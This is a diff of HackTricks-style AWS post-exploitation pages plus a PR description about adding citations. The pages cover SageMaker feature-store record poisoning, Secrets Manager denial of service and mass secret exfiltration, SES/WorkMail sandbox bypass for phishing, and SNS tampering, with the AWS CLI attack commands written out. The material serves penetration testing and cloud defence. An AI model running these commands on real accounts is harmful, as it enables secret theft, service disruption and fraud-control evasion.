+`PutRecord` is a full overwrite: retrieve the latest record, preserve its existing feature values, change the values of interest, and submit the complete record. The event time must be later than the current online record for the new values to become the latest online version; `GetRecord` returns only that latest version.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)[[10]](#references)[[11]](#references)</sup>
 
 1) Read the current legitimate record
 ```bash
@@ -46,7 +62,8 @@ aws sagemaker-featurestore-runtime get-record \
 ```bash
 NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
 
-# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user
+# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user.
+# Preserve every feature from the record returned above; these names are illustrative.
 aws sagemaker-featurestore-runtime put-record \
   --region $REGION \
   --feature-group-name "$FG" \
@@ -72,7 +89,7 @@ aws sagemaker-featurestore-runtime get-record \
 
 ### Attack Scenario 2: Malicious Data Injection (Create Fraudulent Records)
 
-Inject completely new records with manipulated features to evade security controls:
+Inject completely new records with manipulated features to evade security controls. `PutRecord` can add a new record as well as overwrite an existing one; the OnlineStore then serves the newest event-time record for that identifier.<sup>[[5]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
@@ -103,7 +120,7 @@ aws sagemaker-featurestore-runtime get-record \
 
 ### Attack Scenario 3: Sensitive Data Exfiltration
 
-Read multiple records to extract confidential features and profile model behavior:
+Read multiple records to extract confidential features and profile model behavior. `GetRecord` returns all latest feature values unless a feature-name filter is supplied.<sup>[[2]](#references)[[6]](#references)[[11]](#references)</sup>
 
 ```bash
 # Exfiltrate data for known users
@@ -124,11 +141,28 @@ If you need to create a test Feature Group:
 
 ```bash
 REGION=${REGION:-us-east-1}
-FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text)
-if [ -z "$FG" -o "$FG" = "None" ]; then
+FG=""
+while IFS= read -r CANDIDATE; do
+  [ -n "$CANDIDATE" ] && [ "$CANDIDATE" != "None" ] || continue
+  ENABLED=$(aws sagemaker describe-feature-group \
+    --region "$REGION" \
+    --feature-group-name "$CANDIDATE" \
+    --query 'OnlineStoreConfig.EnableOnlineStore' \
+    --output text)
+  if [ "$ENABLED" = "True" ]; then
+    FG="$CANDIDATE"
+    break
+  fi
+done < <(
+  aws sagemaker list-feature-groups \
+    --region "$REGION" \
+    --query 'FeatureGroupSummaries[].FeatureGroupName' \
+    --output text | tr '\t' '\n'
+)
+
+if [ -z "$FG" ]; then
   ACC=$(aws sts get-caller-identity --query Account --output text)
   FG=test-fg-$ACC-$(date +%s)
-  ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole)
   
   aws sagemaker create-feature-group \
     --region $REGION \
@@ -142,8 +176,7 @@ if [ -z "$FG" -o "$FG" = "None" ]; then
       {\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"},
       {\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"}
     ]" \
-    --online-store-config "{\"EnableOnlineStore\":true}" \
-    --role-arn "$ROLE_ARN"
+    --online-store-config "{\"EnableOnlineStore\":true}"
   
   echo "Waiting for feature group to be in Created state..."
   for i in $(seq 1 40); do
@@ -155,7 +188,20 @@ fi
 echo "Feature Group ready: $FG"
 ```
 
+This example creates an online-only group, so it omits `--role-arn`; that option is the execution role used to persist data when an `OfflineStoreConfig` is supplied. The feature definitions, record identifier, event-time field, and `EnableOnlineStore` flag must match the service schema.<sup>[[4]](#references)[[12]](#references)</sup>
+
 ## References
-- [AWS SageMaker Feature Store Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store.html)
-- [Feature Store Security Best Practices](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-security.html)
+
+- [1] [AWS SageMaker Feature Store Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store.html)
+- [2] [Feature Store Security Best Practices](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-security.html)
+- [3] [ListFeatureGroups - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_ListFeatureGroups.html)
+- [4] [DescribeFeatureGroup - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_DescribeFeatureGroup.html)
+- [5] [PutRecord - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_feature_store_PutRecord.html)
+- [6] [GetRecord - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_feature_store_GetRecord.html)
+- [7] [Add features and records to a feature group - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-update-feature-group.html)
+- [8] [Feature Store concepts - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-concepts.html)
+- [9] [list-feature-groups - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sagemaker/list-feature-groups.html)
+- [10] [put-record - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sagemaker-featurestore-runtime/put-record.html)
+- [11] [get-record - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sagemaker-featurestore-runtime/get-record.html)
+- [12] [create-feature-group - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sagemaker/create-feature-group.html)
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - Secrets Manager Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Secrets Manager
 
 For more information check:
@@ -16,10 +14,10 @@ The **secrets themself are sensitive information**, [check the privesc page](../
 
 ### DoS Change Secret Value
 
-Changing the value of the secret you could **DoS all the system that depends on that value.**
+Changing a secret value can **DoS every system that depends on it**. `PutSecretValue` creates a new encrypted version and, unless an explicit staging label is supplied, moves `AWSCURRENT` to it while assigning `AWSPREVIOUS` to the old current version. This preserves a rollback path.<sup>[[1]](#references)</sup> Consumers using the current value may fail until the value is restored.
 
 > [!WARNING]
-> Note that previous values are also stored, so it's easy to just go back to the previous value.
+> The previous version remains stored under `AWSPREVIOUS` and can be selected or restored using its staging label.<sup>[[1]](#references)</sup>
 
 ```bash
 # Requires permission secretsmanager:PutSecretValue
@@ -30,11 +28,11 @@ aws secretsmanager put-secret-value \
 
 ### DoS Change KMS key
 
-If the attacker has the secretsmanager:UpdateSecret permission, they can configure the secret to use a KMS key owned by the attacker. That key is initially set up in such a way that anyone can access and use it, so updating the secret with the new key is possible. If the key was not accessible, the secret could not be updated.
+An attacker with `secretsmanager:UpdateSecret` and the required permissions on a customer-managed KMS key they control can associate that key with the secret. `UpdateSecret` uses the selected key for new versions and existing versions labeled `AWSCURRENT`, `AWSPENDING`, or `AWSPREVIOUS`; when the caller has the needed KMS permissions, Secrets Manager re-encrypts those labeled versions while retaining the existing versions encrypted with the previous key.<sup>[[2]](#references)[[3]](#references)</sup>
 
-After changing the key for the secret, the attacker modifies the configuration of their key so that only they can access it. This way, in the subsequent versions of the secret, it will be encrypted with the new key, and since there is no access to it, the ability to retrieve the secret would be lost.
+After associating the key, the attacker can tighten its key policy so consuming roles no longer have `kms:Decrypt`, causing reads of the newly encrypted versions to fail. Changing the key alone may leave labeled versions decryptable with the previous key; to make `AWSCURRENT` depend on the new key, create a new secret version after the key change.<sup>[[2]](#references)[[3]](#references)[[6]](#references)</sup>
 
-It is important to note that this inaccessibility will only occur in later versions, after the content of the secret changes, since the current version is still encrypted with the original KMS key.
+The key change requires `secretsmanager:UpdateSecret`; customer-managed keys also require the relevant KMS permissions for the caller.<sup>[[2]](#references)</sup>
 
 ```bash
 aws secretsmanager update-secret \
@@ -44,7 +42,7 @@ aws secretsmanager update-secret \
 
 ### DoS Deleting Secret
 
-The minimum number of days to delete a secret are 7
+The recovery window for `DeleteSecret` is 7 to 30 days. During that window the secret is scheduled for deletion and cannot be read.<sup>[[4]](#references)</sup> The command below uses the minimum seven-day window.
 
 ```bash
 aws secretsmanager delete-secret \
@@ -54,7 +52,7 @@ aws secretsmanager delete-secret \
 
 ## secretsmanager:RestoreSecret
 
-It is possible to restore a secret, which allows the restoration of secrets that have been scheduled for deletion, since the minimum deletion period for secrets is 7 days and the maximum is 30 days. Together with the secretsmanager:GetSecretValue permission, this makes it possible to retrieve their contents.
+`RestoreSecret` cancels a scheduled deletion and makes the secret accessible again. A secret can be restored during its 7-to-30-day recovery window; after restoration, a caller with `secretsmanager:GetSecretValue` can retrieve its contents.<sup>[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 To recover a secret that is in the process of being deleted, you can use the following command:
 ```bash
@@ -64,7 +62,7 @@ aws secretsmanager restore-secret \
 
 ## secretsmanager:DeleteResourcePolicy
 
-This action allows deleting the resource policy that controls who can access a secret. This could lead to a DoS if the resource policy was configured to allow access to a specific set of users.
+This action removes the resource-based permission policy attached to a secret and requires `secretsmanager:DeleteResourcePolicy`.<sup>[[7]](#references)</sup> It can cause a DoS when that policy was the path granting access to a specific set of users or roles.
 
 To delete the resource policy:
 ```bash
@@ -74,11 +72,11 @@ aws secretsmanager delete-resource-policy \
 
 ## secretsmanager:UpdateSecretVersionStage
 
-The states of a secret are used to manage versions of a secret. AWSCURRENT marks the active version that applications use, AWSPREVIOUS keeps the previous version so that you can roll back if necessary, and AWSPENDING is used in the rotation process to prepare and validate a new version before making it the current one.
+Secrets Manager uses staging labels to track versions: `AWSCURRENT` identifies the current version, `AWSPREVIOUS` the previous version, and `AWSPENDING` a pending version during rotation. A default `GetSecretValue` call returns `AWSCURRENT`.<sup>[[8]](#references)</sup>
 
-Applications always read the version with AWSCURRENT. If someone moves that label to the wrong version, the apps will use invalid credentials and may fail.
+Moving `AWSCURRENT` changes what default consumers read.<sup>[[8]](#references)[[9]](#references)</sup> Moving it to the wrong version may make applications use invalid credentials and fail. When `AWSCURRENT` moves, Secrets Manager automatically moves `AWSPREVIOUS` to the version it left; `AWSPREVIOUS` is not an automatic fallback by itself.<sup>[[8]](#references)[[9]](#references)</sup>
 
-AWSPREVIOUS is not used automatically. However, if AWSCURRENT is removed or reassigned incorrectly, it may appear that everything is still running with the previous version.
+The operation requires `secretsmanager:UpdateSecretVersionStage`.<sup>[[9]](#references)</sup>
 
 ```bash
 aws secretsmanager update-secret-version-stage \
@@ -88,33 +86,28 @@ aws secretsmanager update-secret-version-stage \
   --remove-from-version-id <previous-version-id>
 ```
 
-
-
-
-
-
-
 ### Mass Secret Exfiltration via BatchGetSecretValue (up to 20 per call)
 
-Abuse the Secrets Manager BatchGetSecretValue API to retrieve up to 20 secrets in a single request. This can dramatically reduce API-call volume compared to iterating GetSecretValue per secret. If filters are used (tags/name), ListSecrets permission is also required. CloudTrail still records one GetSecretValue event per secret retrieved in the batch.
+Abuse the Secrets Manager `BatchGetSecretValue` API to retrieve up to 20 secrets in a single request.<sup>[[10]](#references)</sup> This can reduce API-call volume compared with iterating `GetSecretValue` per secret. If filters are used (tags/name), `ListSecrets` permission is also required.<sup>[[10]](#references)</sup> CloudTrail still records one `GetSecretValue` event per secret retrieved in the batch.<sup>[[10]](#references)</sup>
 
-Required permissions
-- secretsmanager:BatchGetSecretValue
-- secretsmanager:GetSecretValue for each target secret
-- secretsmanager:ListSecrets if using --filters
-- kms:Decrypt on the CMKs used by the secrets (if not using aws/secretsmanager)
+Required permissions<sup>[[10]](#references)</sup>
+
+- secretsmanager:BatchGetSecretValue<sup>[[10]](#references)</sup>
+- secretsmanager:GetSecretValue for each target secret<sup>[[10]](#references)</sup>
+- secretsmanager:ListSecrets if using --filters<sup>[[10]](#references)</sup>
+- kms:Decrypt on the CMKs used by the secrets (if not using aws/secretsmanager)<sup>[[10]](#references)</sup>
 
 > [!WARNING]
-> Note that the permission `secretsmanager:BatchGetSecretValue` is not included enough to retrieve secrets, you also need `secretsmanager:GetSecretValue` for each secret you want to retrieve.
+> The permission `secretsmanager:BatchGetSecretValue` alone is not enough to retrieve secrets; you also need `secretsmanager:GetSecretValue` for each target secret.<sup>[[10]](#references)</sup>
 
-Exfiltrate by explicit list
+Exfiltrate by explicit list of secret names or ARNs:<sup>[[10]](#references)</sup>
 ```bash
 aws secretsmanager batch-get-secret-value \
   --secret-id-list <secret1> <secret2> <secret3> \
   --query 'SecretValues[].{Name:Name,Version:VersionId,Val:SecretString}'
 ```
 
-Exfiltrate by filters (tag key/value or name prefix)
+Exfiltrate by filters (tag key/value or name prefix). Filtered requests also require `secretsmanager:ListSecrets`.<sup>[[10]](#references)</sup>
 ```bash
 # By tag key
 aws secretsmanager batch-get-secret-value \
@@ -132,13 +125,28 @@ aws secretsmanager batch-get-secret-value \
   --filters Key=name,Values=MyApp
 ```
 
-Handling partial failures
+Handling partial failures: inspect the `Errors` list for `AccessDenied`/`NotFound` and retry or adjust filters.<sup>[[10]](#references)</sup>
 ```bash
 # Inspect the Errors list for AccessDenied/NotFound and retry/adjust filters
 aws secretsmanager batch-get-secret-value --secret-id-list <id1> <id2> <id3>
 ```
 
 Impact
-- Rapid “smash-and-grab” of many secrets with fewer API calls, potentially bypassing alerting tuned to spikes of GetSecretValue.
-- CloudTrail logs still include one GetSecretValue event per secret retrieved by the batch.
+
+- Rapid “smash-and-grab” of many secrets with fewer API calls.<sup>[[10]](#references)</sup> This may make volume-based alerting less obvious.
+- CloudTrail logs still include one `GetSecretValue` event per secret retrieved by the batch.<sup>[[10]](#references)</sup>
+
+## References
+
+- [1] [PutSecretValue - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_PutSecretValue.html)
+- [2] [UpdateSecret - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_UpdateSecret.html)
+- [3] [Change the encryption key for an AWS Secrets Manager secret](https://docs.aws.amazon.com/secretsmanager/latest/userguide/manage_update-encryption-key.html)
+- [4] [DeleteSecret - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_DeleteSecret.html)
+- [5] [RestoreSecret - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_RestoreSecret.html)
+- [6] [GetSecretValue - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html)
+- [7] [DeleteResourcePolicy - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_DeleteResourcePolicy.html)
+- [8] [What's in a Secrets Manager secret?](https://docs.aws.amazon.com/secretsmanager/latest/userguide/whats-in-a-secret.html)
+- [9] [UpdateSecretVersionStage - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_UpdateSecretVersionStage.html)
+- [10] [BatchGetSecretValue - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_BatchGetSecretValue.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - SES Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## SES
 
 For more information check:
@@ -12,18 +10,18 @@ For more information check:
 
 ### `ses:SendEmail`
 
-Send an email.
+Send a simple email that SES queues for delivery. The sender must be a verified SES identity; while the account is in the SES sandbox, recipients must also be verified or use the mailbox simulator.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json
-aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json
+aws sesv2 send-email --from-email-address sender@example.com --destination file://emails.json --content file://message.json
 ```
 
 Still to test.
 
 ### `ses:SendRawEmail`
 
-Send an email.
+Send a MIME-formatted email, allowing custom headers and attachments. The sender still must be a verified identity, and sandbox accounts can send only to verified recipients or the mailbox simulator.<sup>[[4]](#references)</sup>
 
 ```bash
 aws ses send-raw-email --raw-message file://message.json
@@ -33,27 +31,27 @@ Still to test.
 
 ### `ses:SendTemplatedEmail`
 
-Send an email based on a template.
+Send an email based on an existing template; the template data is required even when the template has no replacement values.<sup>[[5]](#references)</sup>
 
 ```bash
-aws ses  send-templated-email --source <value> --destination <value> --template <value>
+aws ses send-templated-email --source sender@example.com --destination file://destination.json --template <template-name> --template-data file://template-data.json
 ```
 
 Still to test.
 
 ### `ses:SendBulkTemplatedEmail`
 
-Send an email to multiple destinations
+Send a templated email to multiple destinations. The call requires default template data and at least one destination object; a request can include up to 50 destinations.<sup>[[6]](#references)</sup>
 
 ```bash
-aws ses send-bulk-templated-email --source <value> --template <value>
+aws ses send-bulk-templated-email --source sender@example.com --template <template-name> --default-template-data file://template-data.json --destinations file://destinations.json
 ```
 
 Still to test.
 
 ### `ses:SendBulkEmail`
 
-Send an email to multiple destinations.
+Send an email to multiple destinations with the SES API v2 bulk operation; `--default-content` and `--bulk-email-entries` are required inputs.<sup>[[7]](#references)</sup>
 
 ```
 aws sesv2 send-bulk-email --default-content <value> --bulk-email-entries <value>
@@ -61,7 +59,7 @@ aws sesv2 send-bulk-email --default-content <value> --bulk-email-entries <value>
 
 ### `ses:SendBounce`
 
-Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email.
+Generate and send a **bounce email** to the sender of a message received through SES. This can only be done **up to 24h after receiving** the email, and the operation cannot be used for generic bounces.<sup>[[8]](#references)</sup>
 
 ```bash
 aws ses send-bounce --original-message-id <value> --bounce-sender <value> --bounced-recipient-info-list <value>
@@ -71,7 +69,7 @@ Still to test.
 
 ### `ses:SendCustomVerificationEmail`
 
-This will send a customized verification email. You might need permissions also to created the template email.
+Send a customized verification email and attempt to add the address as an SES identity. A custom verification template must already exist; creating that template is a separate operation and may require additional permissions.<sup>[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 aws ses send-custom-verification-email --email-address <value> --template-name <value>
@@ -82,7 +80,9 @@ Still to test.
 
 ## WorkMail pivot to bypass SES sandbox
 
-When `ses:GetAccount` shows the account is still in the SES sandbox and `ses:ListIdentities` returns no verified senders, attackers can **pivot to WorkMail** to send immediately (no sandbox and higher default quotas) by creating orgs, verifying domains, and registering mailboxes.
+When `ses:GetAccount` shows the account is still in the SES sandbox and `ses:ListIdentities` returns no verified senders, attackers can **pivot to WorkMail** by creating organizations, verifying domains, and registering mailbox users.<sup>[[1]](#references)[[13]](#references)[[14]](#references)[[15]](#references)[[16]](#references)</sup>
+
+The SES sandbox is Region-specific and limits sending to verified recipients (or the mailbox simulator), 200 messages per 24 hours, and 1 message per second. Rapid7 reports that WorkMail has no comparable sandbox, so mail can be sent immediately to external, unverified recipients; AWS documents a default quota of 100,000 external recipients per AWS account per day for custom domains.<sup>[[1]](#references)[[11]](#references)[[12]](#references)</sup>
 
 {{#ref}}
 ../aws-workmail-post-exploitation/README.md
@@ -90,10 +90,23 @@ When `ses:GetAccount` shows the account is still in the SES sandbox and `ses:Lis
 
 ## References
 
-- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
+- [1] [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
+- [2] [send-email — AWS CLI (SES)](https://docs.aws.amazon.com/cli/latest/reference/ses/send-email.html)
+- [3] [send-email — AWS CLI (SES API v2)](https://docs.aws.amazon.com/cli/latest/reference/sesv2/send-email.html)
+- [4] [send-raw-email — AWS CLI (SES)](https://docs.aws.amazon.com/cli/latest/reference/ses/send-raw-email.html)
+- [5] [send-templated-email — AWS CLI (SES)](https://docs.aws.amazon.com/cli/latest/reference/ses/send-templated-email.html)
+- [6] [send-bulk-templated-email — AWS CLI (SES)](https://docs.aws.amazon.com/cli/latest/reference/ses/send-bulk-templated-email.html)
+- [7] [send-bulk-email — AWS CLI (SES API v2)](https://docs.aws.amazon.com/cli/latest/reference/sesv2/send-bulk-email.html)
+- [8] [send-bounce — AWS CLI (SES)](https://docs.aws.amazon.com/cli/latest/reference/ses/send-bounce.html)
+- [9] [send-custom-verification-email — AWS CLI (SES)](https://docs.aws.amazon.com/cli/latest/reference/ses/send-custom-verification-email.html)
+- [10] [send-custom-verification-email — AWS CLI (SES API v2)](https://docs.aws.amazon.com/cli/latest/reference/sesv2/send-custom-verification-email.html)
+- [11] [Request production access (Moving out of the Amazon SES sandbox)](https://docs.aws.amazon.com/ses/latest/dg/request-production-access.html)
+- [12] [Amazon WorkMail quotas](https://docs.aws.amazon.com/workmail/latest/adminguide/workmail_limits.html)
+- [13] [CreateOrganization — Amazon WorkMail](https://docs.aws.amazon.com/workmail/latest/APIReference/API_CreateOrganization.html)
+- [14] [Adding a domain — Amazon WorkMail](https://docs.aws.amazon.com/workmail/latest/adminguide/add_domain.html)
+- [15] [CreateUser — Amazon WorkMail](https://docs.aws.amazon.com/workmail/latest/APIReference/API_CreateUser.html)
+- [16] [RegisterToWorkMail — Amazon WorkMail](https://docs.aws.amazon.com/workmail/latest/APIReference/API_RegisterToWorkMail.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - SNS Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## SNS
 
 For more information:
@@ -16,66 +14,66 @@ In several cases, SNS topics are used to send messages to platforms that are bei
 
 ### `sns:DeleteTopic`
 
-An attacker could delete an entire SNS topic, causing message loss and impacting applications relying on the topic.
+An attacker could delete an entire SNS topic, causing message loss and impacting applications relying on the topic.<sup>[[1]](#references)</sup>
 
 ```bash
 aws sns delete-topic --topic-arn <value>
 ```
 
-**Potential Impact**: Message loss and service disruption for applications using the deleted topic.
+**Potential Impact**: Message loss and service disruption for applications using the deleted topic.<sup>[[1]](#references)</sup>
 
 ### `sns:Publish`
 
-An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
+An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.<sup>[[2]](#references)</sup>
 
 ```bash
 aws sns publish --topic-arn <value> --message <value>
 ```
 
-**Potential Impact**: Data corruption, unintended actions, or resource exhaustion.
+**Potential Impact**: Data corruption, unintended actions, or resource exhaustion.<sup>[[2]](#references)</sup>
 
 ### `sns:SetTopicAttributes`
 
-An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability.
+An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability.<sup>[[3]](#references)</sup>
 
 ```bash
 aws sns set-topic-attributes --topic-arn <value> --attribute-name <value> --attribute-value <value>
 ```
 
-**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability.
+**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability.<sup>[[3]](#references)</sup>
 
 ### `sns:Subscribe` , `sns:Unsubscribe`
 
-An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
+An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 aws sns subscribe --topic-arn <value> --protocol <value> --endpoint <value>
 aws sns unsubscribe --subscription-arn <value>
 ```
 
-**Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic.
+**Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ### `sns:AddPermission` , `sns:RemovePermission`
 
-An attacker could grant unauthorized users or services access to an SNS topic, or revoke permissions for legitimate users, causing disruptions in the normal functioning of applications that rely on the topic.
+An attacker could grant unauthorized users or services access to an SNS topic, or revoke permissions for legitimate users, causing disruptions in the normal functioning of applications that rely on the topic.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 aws sns add-permission --topic-arn <value> --label <value> --aws-account-id <value> --action-name <value>
 aws sns remove-permission --topic-arn <value> --label <value>
 ```
 
-**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.
+**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ### `sns:TagResource` , `sns:UntagResource`
 
-An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.<sup>[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 aws sns tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
 aws sns untag-resource --resource-arn <value> --tag-keys <key>
 ```
 
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.<sup>[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ### More SNS Post-Exploitation Techniques
 
@@ -91,6 +89,17 @@ aws-sns-fifo-replay-exfil.md
 aws-sns-firehose-exfil.md
 {{#endref}}
 
+## References
+
+- [1] [DeleteTopic - Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/api/API_DeleteTopic.html)
+- [2] [Publish - Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/api/API_Publish.html)
+- [3] [SetTopicAttributes - Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/api/API_SetTopicAttributes.html)
+- [4] [Subscribe - Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/api/API_Subscribe.html)
+- [5] [Unsubscribe - Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/api/API_Unsubscribe.html)
+- [6] [AddPermission - Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/api/API_AddPermission.html)
+- [7] [RemovePermission - Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/api/API_RemovePermission.html)
+- [8] [TagResource - Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/api/API_TagResource.html)
+- [9] [UntagResource - Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/api/API_UntagResource.html)
+- [10] [Amazon SNS topic tagging - Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/dg/sns-tags.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-


### PR DESCRIPTION
Audits SUMMARY.md positions 251–300 and normalizes their source attribution.

- numbers each page reference list and links source-specific claims with superscript citations
- keeps a single References section at the end of each page, followed only by the training banner
- credits primary sources and removes unsupported/invalid material found during review
- preserves existing content and references unless a technical correction was required
- confirms no hackingthe.cloud content or references remain in the reviewed pages

Validation:
- custom structural/reference validator: 49 changed pages, 0 errors
- duplicate and near-duplicate prose scan reviewed
- git diff --check
- repository-wide hackingthe.cloud scan